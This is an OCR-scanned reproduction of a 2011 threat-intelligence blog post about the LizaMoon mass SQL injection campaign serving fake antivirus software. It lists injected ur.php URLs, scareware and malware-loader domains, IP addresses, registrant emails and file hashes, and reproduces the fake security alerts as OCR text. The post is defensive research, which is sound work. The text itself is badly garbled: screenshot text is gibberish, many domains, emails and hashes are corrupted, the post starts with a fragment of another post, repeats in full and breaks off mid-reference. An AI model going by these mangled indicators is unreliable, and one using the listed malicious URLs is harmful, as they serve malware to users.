mialepromo. ru/7Pe80Rolxs/load.php ?file=9 

mialepromo. ru/7Pe80Rolxs/load.php ?file=uploader 

mialepromo. ru/7Pe80Rolxs/load.php ?file=grabbers 

mialepromo.ru - 89.208.149.204 (AS12695); 109.94.220.51 
(AS47860); 109.94.220.50 (AS47860); 91.199.75.77 

(A544301) 178.17.164.131 (A543289) 193.22.81.104 
(AS28920) - Email: salam@ica.org 

Monitoring of the campaign is ongoing. 

Related posts: 

[4] Spamvertised United Parcel Service notifications 
serve malware 

[5] Spamvertised FedEx Notifications Spread Malware 

706 

[ 6 ] Spamvertised DHL Notification Malware Campaign 

[7] More Spamvertised DHL Notifications Spread 
Malware 



This post has been reproduced from [8]Dane ho 
Danchev's blog. 
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Potential threat details 



Microsoft Security Essentials detected potential threats that might compromise your privacy or damage your 
computer. Your access to these items may be suspended until you take an action. Click'Show details' to learn 
more. 


Detected items 

Alert level 

Recommendation 

Status 

© Unknown Win32/Trojan 

Severe 

Remove 

Suspended 


Category: Trojan 

Description: This program is dangerous and execute commands from an attacker. 

Recommendation: Remove this software immediately. 

Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. 
You can still access the files that these programs use without removing them (not recommended). To access 
these files, select the 'Clean computer' action and click 'Apply action'. If this option is not available, 
log on as administrator or ask the local administrator for help. 

Items: 

C: \ windows\sy stem32\cmd. exe 






I Hide details >> j 






Clean computer 


Apply actions 


Close 


Dissecting the Massive SQL injection Attack Serving 
Sea re ware (2011-03-31 19:54) 

A currently ongoing massive SQL injection attack has 
affected hundreds of thousands of web pages across the 
Web, 

to ultimately monetize the campaign through a scareware 
affiliate program. Such massive SQL injection attempts are 
usually conducted using [ 1 jmass vulnerability scanning 
tools, with the help of [2]search engines which have 
already 

[3]crawled the vulnerable sites. 

















What's particularly interesting about this campaign, is the 
fact that the used domains are all responding to 

the same IPs, including the portfolios of sea re ware domains, 
which the cybercriminals naturally rotate on a periodic basis. 
Let's dissect the campaign, expose the domain portfolios and 
the entire campaign structure. 

UPDATED: Related SQL injected URLs [4]courtsesy of 
WebSense: 

online-stats201.info/ur.php - Email: tik0066@gmaii.com 

stats-masterl 11.info/ur.php - Email: tik0066@gmail.com 

agasi-story.info/ur.php - 91.217.162.45 - Email: 
tik0066@gmail. com 

general-st. info/ur.php - Email: tik0066@gmail.com 
extra-service.info/ur.php - Email: tik0066@gmail.com 
sol-stats.info/ur.php - Email: tik0066@gmail.com 

google-stats49.info/ur.php - Email: tik0066@gmail.com 
googie-stats45.inf o/ur.php - Email: tik0066@gmail.com 
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5yrtcmT«kt 

[vj Vtew{y{t«nr/ormi(lcn 
^ Add or remove programs 
O' Oungeasrttrigs 


Other Place* 

%.£ r<v Network Pisces 
My Documents 
O Shared Document* 
Control Panel 


DriA 


My Computer 

System Polder 



System scan progress 


J Shared Documents 

j / My Documents 

0 2f» tro}am 

0 39 worms 

Hard drives 


»-Tlocal Cwk (C:) 

Local Owk (D:) 

0 34 worms 

0 17 trojans 

DVD 





Now scanning: nmmvrvc.exe 


^ Your Computer is 


Name 

Risk level 

Date 

Wesrtected 

State 

*] 

% EiiMirWtttm.WinJZ.Nft 

Critical 

24 APR 2010 

42 

w 4 en 9 rww.il 

n 

£ t mtnl -Wttrm.WlnJ2.Myd 

Critical 

26 OCT 2010 

20 

Wadmg removal 


« TnOmiHr.Win 

Critical 

FEB 

37 

WaAng removal 

_J 


Description: 

This program is potenbaiy dangerous for your system. TrojarvDownloader stealng passwords, credt cards and other personal 
formation from your computer. 

Advice: 

You need to remove this threat as soon as possfcJei 


googie-stats50.info/ur.php - Email: tik0066@gmail.com 

google-server43.info/ur.php - Email: tik0066@gmail.com 

stats-master88.info/ur.php - Email: tik0066@gmail.com 

eva-marine. info/ur. php - 109.236.81.28 - Email: 
tik0066@gmail. com 

stats-master99.info/ur.php - Email: tik0066@gmail.com 

tzv-stats. info/ur.php - Email: tik0066@gmail.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

SQL injected URLs: 

iizamoon.com/ur.php ( 67,500 results) - 91.220.35.151 
(AS3721); 91.213.29.182 (A551786); 95.64.9.18 (AS50244) - 
















Email: jamesnorthone@hotmaiibox. com 


alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox. com 

alisa-carter.com/ur.php ( 220,000 results) - Email: 
jamesnorthone@hotmailbox. com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox. com 

t6ryt56.info/ur.php (18 results) - Email: support@ru\er- 
domains.com 

tadygus.com/ur.php (100 results) - Email: 
jamesnorthone@hotmailbox. com 

worid-of-books.com/ur.php ( 334,000 results) - Email: 
tik0066@gmail. com 

Upon successful redirection, the campaign attempts to load 
the scareware domains defender-nibea.in/scanlb/237 - 

46.252.130.200 - Email: jimwei2969@gmail.com 

Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 
41(22.0%) 

MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : Ib3c35afb76c53cd9507fffee46fb58c29e72bcl 

709 

SHA256: 

cd902b92042435c2d 70d4bf59acc2de8229bfc367626961 f76 



c03f75dcd7e95c 


Responding to 46.252.130.200 (A525190; KIS-AS UAB 
"Kauno Interneto Sistemos") are also: 

antivirus-1091. co. cc 

antivirus-1574. co. cc 

antivirus-2051, co. cc 

antivirus-2525, co. cc 

antivirus-2932, co. cc 

antivirus-3654, co. cc 

antivirus-3833, co. cc 

antivirus-4063. co. cc 

antivirus-418, co. cc 

antivirus-4303, co. cc 

antivirus-4749. co. cc 

antivirus-495, co. cc 

antivirus-5216. co. cc 

antivirus-5676. co. cc 

antivirus-5802, co. cc 

antivirus-6437. co. cc 


antivirus-6703, co. cc 



antivirus-7081.co.cc 


antivirus- 713. co. cc 
antivirus-728. co. cc 
antivirus-7357. co. cc 
antivirus-8072, co. cc 
antivirus-9009, co. cc 
antivirus-9638, co. cc 
antivirus-9667, co. cc 

defender-aabv.in - Email: leonfianagan7681@gmail.com 

defender-aqeu. co. cc 
defender-asng. co. cc 

defender-atio.in - Email: terriduverger3239@gmaii.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-b wuy. co. cc 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail. com 

defender-dteo.in - Email: giovannaraggio5417@gmail.com 

defender-eahy. co. cc 



defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-e wum.co. cc 
defender-eyde. co. cc 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-fola.co. cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
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antivjrl.mooo.com 



defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-hjlk.in - Email: jennwrayford2124@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmaii. com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-iibk. co. cc 


defender-iies. co. cc 






defender-iksl.in - Email: amarasanders9974@gmail.com 

defender-isde. co. cc 
defender-iyrc. co. cc 

defender-jgnl.in - Email: caseyaizen3316@gmail.com 

defender-jih v. co. cc 

defender-keod.in - Email: khashayarbirss4814@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-kzwu. co. cc 
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defender-labm.in - Email: 
gregorybradfordl520@gmail. com 

defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-nhei. co. cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-pakc.in - Email: 
sabrina whee/ock7642@gmail. com 

defender-ppdw.in - Email: divinakempton5670@gmail.com 



defender-qfdx.in - Email: 
hokyeongyar\cey6369@gmail. com 

defender-qotg.in - Email: franchescaiii9704@gmaU.com 
defender-qpwo.in - Email: carlaadams@gmail.com 

defender-qsko. co. cc 

defender-qumf.in - Email: carlaadams@gmail.com 
defender-rlag.in - Email: carmichaelmail@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-thga.in - Email: youngantonio6055@gmail.com 

defender-ueuv. co. cc 

defender-uqko.in - Email: 
christinakaaikati55 74@gmail. com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 


defender- wtln. co. cc 



defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 

defender-ykym. co. cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 

mo vies-live-tube-jeyq. co. cc 

movie-tkhk.in - Email: terrymeallyl288@gmaii.com 

movie-tube-beym.co.cc 
mo vie-tube-juie. co. cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 
movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxni.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 
system-scanner-boep.co.cc 
system-scanner-eill. co. cc 
system-scanner-eopa.co.cc 
system-scanner-e wqq. co. cc 
system-scanner-iaap. co. cc 
system-scarmer-ieyx. co. cc 



system-scanner-lcyo. co. cc 
system-scanner-ouny.co.cc 
system-scarmer-oypx. co. cc 
system-scanner-qeap.co.cc 
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system-scanner-racv.co.cc 
system-scanner-ryes. co. cc 
system-scanner-tzii. co. cc 
system-scanner-uemo.co.cc 
system-scanner-uotu.co.cc 
system-scanner-uyxt. co. cc 
system -scanner- vpoo. co. cc 
system-scanner-xtoi. co. cc 
system-scanner-yoyx. co. cc 
system-scanner-ytut. co. cc 

Rotated scareware domains involved in the campaign, 
responding to 84.123.115.228 (AS6739; 0N0-A5 Ca¬ 
ble uropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmaii.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 



defender-gnva.in - Email: ananddaher7294@gmail.com 

defender-rlob.in - Email: 
vasikaranfreudenburg2690@gmaii.com 

defender-abcc.in - Email: rubysmart5057@gmail.com 

defender-pakc.in - Email: 
sabrina wheelock7642@gmail. com 

defender-keod.in - Email: khashayarbirss4814@gmail.com 

defender-xcre.in - Email: pavelmayer4891@gmail.com 

defender-qumf.in - Email: rachelalbal891@gmail.com 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-uvag.in - Email: espenkeck7682@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmail. com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-lcoh.in - Email: timothythomas6924@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-wbui.in - Email: carlosbuntschul238@gmail.com 
defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 
defender-hjlk.in - Email: Iauriefreeman9930@gmail.com 
defender-endl.in - Email: adamgaylardlll3@gmail.com 



defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-iksl.in - Email: marasanders9974@gmaii.com 

defender-labm.in - Email: 
gregorybradfordl520@gmail. com 

defender-rrin.in - Email: kevincharoenset5321@gmail.com 

defender-sxin.in - Email: taloupavlinovich7166@gmail.com 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-dteo.in - Email: giovannaraggio5417@gmail.com 

defender-uqko.in - Email: 
christinakaaikati55 74@gmail. com 

defender-qpwo.in - Email: carlaadams@gmail.com 

defender-atxo.in - Email: celineiebba9266@gmail.com 

defender-rlfp.in - Email: Iatanyamuscatell9507@gmail.com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-eklq.in - Email: 
sebastiensheppard8680@gmaii.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail. com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-drnr.in - Email: sumanvcasquez2008@gmail.com 


713 



defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-kuts.in - Email: rogerfrancis3322@gmail.com 

defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-grit.in - Email: anthonygaylard9887@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-aabv.in - Email: leonf1anagan7681@gmail.com 

defender-ppdw.in - Email: divinakempton5670@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmaU. com 

defender-xnnx.in - Email: sylviawulff2140@gmail.com 

defender-xkox.in - Email: ryanmartin7607@gmail.com 

The sea reware domains have been registered using 
automatically registered email accounts at Gmail, as a pre¬ 
caution in an attempt to make it harder to expose the 
campaign by using a single email only. 

Monitoring of the campaign is ongoing. 

Related posts: 



• [6]5QL Injection Through Search Engines Reconnaissance 

• [7]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [8]Massive SQL Injection Attacks - the Chinese Way 

• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [lOjGoDaddy's Mass Word Press Blogs Compromise Serving 
Sea re ware 

• [lljDissecting the Word Press Biogs Compromise at 
Network Solutions 

• [12JYet Another Massive SQL Injection Spotted in the Wild 

• [13JSmells Like a Copycat SQL Injection In the Wild 

• [14]Fast-Fluxing SQL Injection Attacks 

• [15]0bfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [16]Dancho 
Danchev's blog. 

1. htto://ddanchev.bio as oot.com/2008/10/massive-sa i- 
in iection-attacks-chinese.html 

2. htto://ddanchev.bio as oot.com/2007/07/sai-iniection- 
throuah-search-enaines.html 

3. htto://ddanchev. bio as oot. com/2009/04/massive-sa l- 
in iections-throuah-search.html 


4. 

http-.//community websense. com/bloas/securitvlabs/archive/2 




















011/03/31/uoda te-on-lizamoon-mass-iniection. a s ox 

5. 

htto://www. virustotai com/file-scan/report.html? 
id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961 

f76c03f 

75dcd7e95c-l 301586582 

6. http://ddanchev.blp as ppt.com/2007707/sal-iniection- 
throuah-search-enaines.html 

7. http://ddanchev.blo as pot.com/2009/04/massive-sq l- 
in iections-throuah-search.html 
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8. http://ddanchev.blo as pot.com/2008/1O/massive-sq l- 
in iection-attacks-chinese.html 

9. http.V/ddanchev.blo as pot.com/2010/07/cvbercriminals-sa l- 
in iect-cvbercrime.html 

10. http.V/ddanchev.blo as pot. com/2010/04/aodaddvs-mass- 
wordoress-bloas.html 

11. http.V/ddanchev.blo as pot.com/2010/04/dissectin a- 
wordpress-bloas-comoromise.html 

12. http.V/ddanchev.blo as oot.com/2008/05/vet-another- 
massive-sal-iniection.html 

13. http.V/ddanchev.blo as oot.com/2008/07/smells-like- 
cop vcat-sql-iniection-in.html 

14. http.V/ddanchev.blo as pot.com/2008/05/fast-fluxina-sq l- 
in iection-attacks. html 





















































15. htto.V/ddanchev.blo as pot.com/2008/07Zobfuscatina-fast- 
f1uxed-sal-iniected.html 

16. http://ddanchev.bio as oot.com/ 
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Potential threat details 


Microsoft Security Essentials detected potential threats that might compromise your privacy or damage your 
computer. Your access to these items may be suspended until you take an action. Click'Show details' to learn 
more. 


Detected items 

Alert level 

Recommendation 

Status 

© Unknown Win32/Trojan 

Severe 

Remove 

Suspended 


Category: Trojan 

Description: This program is dangerous and execute commands from an attacker. 

Recommendation: Remove this software immediately. 

Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. 
You can still access the files that these programs use without removing them (not recommended). To access 
these files, select the 'Clean computer' action and click 'Apply action'. If this option is not available, 
log on as administrator or ask the local administrator for help. 

Items: 

C: \ windows\sy stem32\cmd. exe 


Hide details >> 


Clean computer 


Apply actions 


Close 


Dissecting the Massive SQL Injection Attack Serving 
Sea re ware (2011-03-31 19:54) 

A currently ongoing massive SQL injection attack has 
affected hundreds of thousands of web pages across the 
Web , 
























to ultimately monetize the campaign through a scareware 
affiliate program. Such massive SQL injection attempts are 
usually conducted using [ 1 jmass vulnerability scanning 
tools, with the help of [2]search engines which have 
already 

[3]crawled the vulnerable sites. 

What's particularly interesting about this campaign, is the 
fact that the used domains are all responding to 

the same IPs, including the portfolios of scareware domains, 
which the cybercriminals naturally rotate on a periodic basis. 
Let's dissect the campaign, expose the domain portfolios and 
the entire campaign structure. 

UPDATED: Related SQL injected URLs [4]courtsesy of 
WebSense: 

online-stats201.info/ur.php - Email: tik0066@gmaii.com 

stats-masterlll.info/ur.php - Email: tik0066@gmail.com 

agasi-story. info/ur.php - 91.217.162.45 - Email: 
tik0066@gmail. com 

general-st.info/ur.php - Email: tik0066@gmaii.com 
extra-service.info/ur.php - Email: tik0066@gmail.com 
sol-stats.info/ur.php - Email: tik0066@gmail.com 

google-stats49.info/ur.php - Email: tik0066@gmail.com 
googie-stats45.info/ur.php - Email: tik0066@gmail.com 
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5yrtcmT«kt 

[vj Vtew{y{t«nr/ormi(lcn 
^ Add or remove programs 
O' Oungeasrttrigs 


Other Place* 

%.£ r<v Network Pisces 
My Documents 
O Shared Document* 
Control Panel 


DriA 


My Computer 

System Polder 



System scan progress 


J Shared Documents 

j / My Documents 

0 2f» tro}am 

0 39 worms 

Hard drives 


»-Tlocal Cwk (C:) 

Local Owk (D:) 

0 34 worms 

0 17 trojans 

DVD 





Now scanning: nmmvrvc.exe 


^ Your Computer is 


Name 

Risk level 

Date 

Wesrtected 

State 

*] 

% EiiMirWtttm.WinJZ.Nft 

Critical 

24 APR 2010 

42 

w 4 en 9 rww.il 

n 

£ t mtnl -Wttrm.WlnJ2.Myd 

Critical 

26 OCT 2010 

20 

Wadmg removal 


« TnOmiHr.Win 

Critical 

FEB 

37 

WaAng removal 

_J 


Description: 

This program is potenbaiy dangerous for your system. TrojarvDownloader stealng passwords, credt cards and other personal 
formation from your computer. 

Advice: 

You need to remove this threat as soon as possfcJei 


googie-stats50.info/ur.php - Email: tik0066@gmail.com 

google-server43.info/ur.php - Email: tik0066@gmail.com 

stats-master88.info/ur.php - Email: tik0066@gmail.com 

eva-marine. info/ur. php - 109.236.81.28 - Email: 
tik0066@gmail. com 

stats-master99.info/ur.php - Email: tik0066@gmail.com 

tzv-stats. info/ur.php - Email: tik0066@gmail.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

SQL injected URLs: 

iizamoon.com/ur.php ( 67,500 results) - 91.220.35.151 
(AS3721); 91.213.29.182 (A551786); 95.64.9.18 (AS50244) - 
















Email: jamesnorthone@hotmaiibox. com 


alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox. com 

alisa-carter.com/ur.php ( 220,000 results) - Email: 
jamesnorthone@hotmailbox. com 

alexblane.com/ur.php ( 3,920 results) - Email: 
jamesnorthone@hotmailbox. com 

t6ryt56.info/ur.php (18 results) - Email: support@ru\er- 
domains.com 

tadygus.com/ur.php (100 results) - Email: 
jamesnorthone@hotmailbox. com 

worid-of-books.com/ur.php ( 334,000 results) - Email: 
tik0066@gmail. com 

Upon successful redirection, the campaign attempts to load 
the scareware domains defender-nibea.in/scanlb/237 - 

46.252.130.200 - Email: jimwei2969@gmail.com 

Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 
41(22.0%) 

MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : Ib3c35afb76c53cd9507fffee46fb58c29e72bcl 
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SHA256: 

cd902b92042435c2d 70d4bf59acc2de8229bfc367626961 f76 



c03f75dcd7e95c 


Responding to 46.252.130.200 (A525190; KIS-AS UAB 
"Kauno Interneto Sistemos") are also: 

antivirus-1091. co. cc 

antivirus-1574. co. cc 

antivirus-2051, co. cc 

antivirus-2525, co. cc 

antivirus-2932, co. cc 

antivirus-3654, co. cc 

antivirus-3833, co. cc 

antivirus-4063. co. cc 

antivirus-418, co. cc 

antivirus-4303, co. cc 

antivirus-4749. co. cc 

antivirus-495, co. cc 

antivirus-5216. co. cc 

antivirus-5676. co. cc 

antivirus-5802, co. cc 

antivirus-6437. co. cc 


antivirus-6703, co. cc 



antivirus-7081.co.cc 


antivirus- 713. co. cc 
antivirus-728. co. cc 
antivirus-7357. co. cc 
antivirus-8072, co. cc 
antivirus-9009, co. cc 
antivirus-9638, co. cc 
antivirus-9667, co. cc 

defender-aabv.in - Email: leonfianagan7681@gmail.com 

defender-aqeu. co. cc 
defender-asng. co. cc 

defender-atio.in - Email: terriduverger3239@gmaii.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-b wuy. co. cc 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail. com 

defender-dteo.in - Email: giovannaraggio5417@gmail.com 

defender-eahy. co. cc 



defender-eklq.in - Email: 
sebastiensheppard8680@gmail.com 

defender-endl.in - Email: adamgaylardlll3@gmail.com 

defender-e wum.co. cc 
defender-eyde. co. cc 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-fola.co. cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
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antivjrl.mooo.com 



defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-hjlk.in - Email: jennwrayford2124@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmaii. com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-iibk. co. cc 


defender-iies. co. cc 






defender-iksl.in - Email: amarasanders9974@gmail.com 

defender-isde. co. cc 
defender-iyrc. co. cc 

defender-jgnl.in - Email: caseyaizen3316@gmail.com 

defender-jih v. co. cc 

defender-keod.in - Email: khashayarbirss4814@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 

defender-kzwu. co. cc 
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defender-labm.in - Email: 
gregorybradfordl520@gmail. com 

defender-lcoh.in - Email: timothythomas6924@gmail.com 

defender-nhei. co. cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-osbi.in - Email: fidelslattum2159@gmail.com 

defender-pakc.in - Email: 
sabrina whee/ock7642@gmail. com 

defender-ppdw.in - Email: divinakempton5670@gmail.com 



defender-qfdx.in - Email: 
hokyeongyar\cey6369@gmail. com 

defender-qotg.in - Email: franchescaiii9704@gmaU.com 
defender-qpwo.in - Email: carlaadams@gmail.com 

defender-qsko. co. cc 

defender-qumf.in - Email: carlaadams@gmail.com 
defender-rlag.in - Email: carmichaelmail@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-thga.in - Email: youngantonio6055@gmail.com 

defender-ueuv. co. cc 

defender-uqko.in - Email: 
christinakaaikati55 74@gmail. com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 


defender- wtln. co. cc 



defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 

defender-ykym. co. cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 

mo vies-live-tube-jeyq. co. cc 

movie-tkhk.in - Email: terrymeallyl288@gmaii.com 

movie-tube-beym.co.cc 
mo vie-tube-juie. co. cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 
movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxni.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 
system-scanner-boep.co.cc 
system-scanner-eill. co. cc 
system-scanner-eopa.co.cc 
system-scanner-e wqq. co. cc 
system-scanner-iaap. co. cc 
system-scarmer-ieyx. co. cc 



system-scanner-lcyo. co. cc 
system-scanner-ouny.co.cc 
system-scarmer-oypx. co. cc 
system-scanner-qeap.co.cc 
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system-scanner-racv.co.cc 
system-scanner-ryes. co. cc 
system-scanner-tzii. co. cc 
system-scanner-uemo.co.cc 
system-scanner-uotu.co.cc 
system-scanner-uyxt. co. cc 
system -scanner- vpoo. co. cc 
system-scanner-xtoi. co. cc 
system-scanner-yoyx. co. cc 
system-scanner-ytut. co. cc 

Rotated scareware domains involved in the campaign, 
responding to 84.123.115.228 (AS6739; 0N0-A5 Ca¬ 
ble uropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmaii.com 

defender-wqga.in - Email: 
christodoulosglidden8856@gmail.com 



defender-gnva.in - Email: ananddaher7294@gmail.com 

defender-rlob.in - Email: 
vasikaranfreudenburg2690@gmaii.com 

defender-abcc.in - Email: rubysmart5057@gmail.com 

defender-pakc.in - Email: 
sabrina wheelock7642@gmail. com 

defender-keod.in - Email: khashayarbirss4814@gmail.com 

defender-xcre.in - Email: pavelmayer4891@gmail.com 

defender-qumf.in - Email: rachelalbal891@gmail.com 

defender-fmof.in - Email: kamillamartinl237@gmail.com 

defender-uvag.in - Email: espenkeck7682@gmail.com 

defender-hsug.in - Email: 
moniquetkarnopp3596@gmail. com 

defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-lcoh.in - Email: timothythomas6924@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-wbui.in - Email: carlosbuntschul238@gmail.com 
defender-vlmj.in - Email: Iauriefreeman9930@gmail.com 
defender-hjlk.in - Email: Iauriefreeman9930@gmail.com 
defender-endl.in - Email: adamgaylardlll3@gmail.com 



defender-jgnl.in - Email: caseyalzen3316@gmail.com 

defender-iksl.in - Email: marasanders9974@gmaii.com 

defender-labm.in - Email: 
gregorybradfordl520@gmail. com 

defender-rrin.in - Email: kevincharoenset5321@gmail.com 

defender-sxin.in - Email: taloupavlinovich7166@gmail.com 

defender-cron.in - Email: Iisasuresh9147@gmail.com 

defender-vqqn.in - Email: chrisjames4421@gmail.com 

defender-dteo.in - Email: giovannaraggio5417@gmail.com 

defender-uqko.in - Email: 
christinakaaikati55 74@gmail. com 

defender-qpwo.in - Email: carlaadams@gmail.com 

defender-atxo.in - Email: celineiebba9266@gmail.com 

defender-rlfp.in - Email: Iatanyamuscatell9507@gmail.com 

defender-vflq.in - Email: terriacuna2081@gmail.com 

defender-eklq.in - Email: 
sebastiensheppard8680@gmaii.com 

defender-ddbr.in - Email: 
selenajohansson9195@gmail. com 

defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-drnr.in - Email: sumanvcasquez2008@gmail.com 
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defender-nrpr.in - Email: burtonalba8156@gmail.com 

defender-kuts.in - Email: rogerfrancis3322@gmail.com 

defender-bcvs.in - Email: martinefinklea5375@gmail.com 

defender-grit.in - Email: anthonygaylard9887@gmail.com 

defender-hmfu.in - Email: Iynnbone8026@gmail.com 

defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-aabv.in - Email: leonf1anagan7681@gmail.com 

defender-ppdw.in - Email: divinakempton5670@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmaU. com 

defender-xnnx.in - Email: sylviawulff2140@gmail.com 

defender-xkox.in - Email: ryanmartin7607@gmail.com 

The sea reware domains have been registered using 
automatically registered email accounts at Gmail, as a pre¬ 
caution in an attempt to make it harder to expose the 
campaign by using a single email only. 

Monitoring of the campaign is ongoing. 

Related posts: 



• [6]5QL Injection Through Search Engines Reconnaissance 

• [7]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [8]Massive SQL Injection Attacks - the Chinese Way 

• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [lOjGoDaddy's Mass Word Press Blogs Compromise Serving 
Sea re ware 

• [lljDissecting the Word Press Biogs Compromise at 
Network Solutions 

• [12JYet Another Massive SQL Injection Spotted in the Wild 

• [13JSmells Like a Copycat SQL Injection In the Wild 

• [14]Fast-Fluxing SQL Injection Attacks 

• [15]0bfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [16]Dancho 
Danchev's blog. 

1. htto://ddanchev.bio as oot.com/2008/10/massive-sa i- 
in iection-attacks-chinese.html 

2. htto://ddanchev.bio as oot.com/2007/07/sai-iniection- 
throuah-search-enaines.html 

3. htto://ddanchev. bio as oot. com/2009/04/massive-sa l- 
in iections-throuah-search.html 


4. 

http-.//community websense. com/bloas/securitvlabs/archive/2 




















011/03/31/uoda te-on-lizamoon-mass-iniection. a s ox 

5. 

htto://www. virustotal. com/file-scan/report.html? 
